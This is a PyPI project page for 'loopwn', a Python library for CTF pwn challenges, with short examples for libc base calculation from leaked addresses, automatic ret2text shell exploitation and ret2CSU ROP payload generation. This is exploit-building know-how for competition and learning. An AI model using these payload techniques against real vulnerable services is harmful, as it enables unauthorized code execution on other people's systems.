A CTF pwn helper library for easy libc address calculation and exploitation
Project description
loopwn
A Python library designed to assist with CTF Pwn challenges, specifically focusing on Libc address calculation and leak exploitation.
Installation
pip install loopwn
Usage
1. Looplibc - Libc Address Calculation
from loopwn import Looplibc
# Example 1: Initialize with a known base address
libc = Looplibc('./libc.so.6', 0x7ffff7a0d000)
# Example 2: Initialize with a leaked symbol address
# This will automatically calculate the base address
libc = Looplibc('./libc.so.6', 'puts', 0x7ffff7a8c5a0)
# Access addresses
print(hex(libc.system))
print(hex(libc.bin_sh))
2. loop2text - Auto Ret2text Exploitation
from pwn import *
from loopwn import loop2text
# Start process
io = process('./pwn')
# Exploit
# Automatically sends payload and verifies shell with an echo check
# Args: padding_length, backdoor_address, io_object
loop2text(112, 0x401186, io)
3. loopcsu - Auto Ret2CSU Payload Generation
from loopwn import loopcsu
# Gadget addresses (Usually found in __libc_csu_init)
# csu_end: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
# csu_start: mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
csu_end = 0x4011da
csu_start = 0x4011c0
# Generate payload
# Args: csu_end, csu_start, r12, r13, r14, r15, return_addr, padding=0
payload = loopcsu(
csu_end, csu_start,
r12=0x601018, # Function pointer (e.g., GOT address)
r13=0, # Arg1 (EDI)
r14=1, # Arg2 (RSI)
r15=2, # Arg3 (RDX)
return_addr=0x401120,
padding=0x20
)
# Send payload
io.sendline(payload)
Features
- Automatic Base Calculation: Easily calculate libc base address from a leaked symbol.
- Quick Access: Get
systemand/bin/shaddresses via properties. - Auto Ret2Text: Generate payload and get shell in one line with
loop2text. - Auto Ret2CSU: Simplify Ret2CSU payload construction with
loopcsu. - Shell Verification: Automatically checks if shell is obtained.
- Pwntools Integration: Inherits from
pwntools'sELFclass.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
loopwn-0.3.6.tar.gz
(8.0 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file loopwn-0.3.6.tar.gz.
File metadata
- Download URL: loopwn-0.3.6.tar.gz
- Upload date:
- Size: 8.0 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
0e32087b79daae414e896391da15fb8393f543b8a71648043671c4490c2b171b
|
|
| MD5 |
f863a6208ccf161df71c5fa5cbf4eec4
|
|
| BLAKE2b-256 |
1c40cd167ff91608a9d1302b006ceba05bad16c2168c4a9aac1b765289c1889f
|
File details
Details for the file loopwn-0.3.6-py3-none-any.whl.
File metadata
- Download URL: loopwn-0.3.6-py3-none-any.whl
- Upload date:
- Size: 8.9 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
84fb40abfcccc5e219b0e784bd946c3b888e3a5637248c28435d59ae55f073b8
|
|
| MD5 |
4c593b855ab1a07db691928828728425
|
|
| BLAKE2b-256 |
aac4a3d1d6cb50206167bd88d4fa50d174a2572f05bac51141b0cae60a9f8e57
|
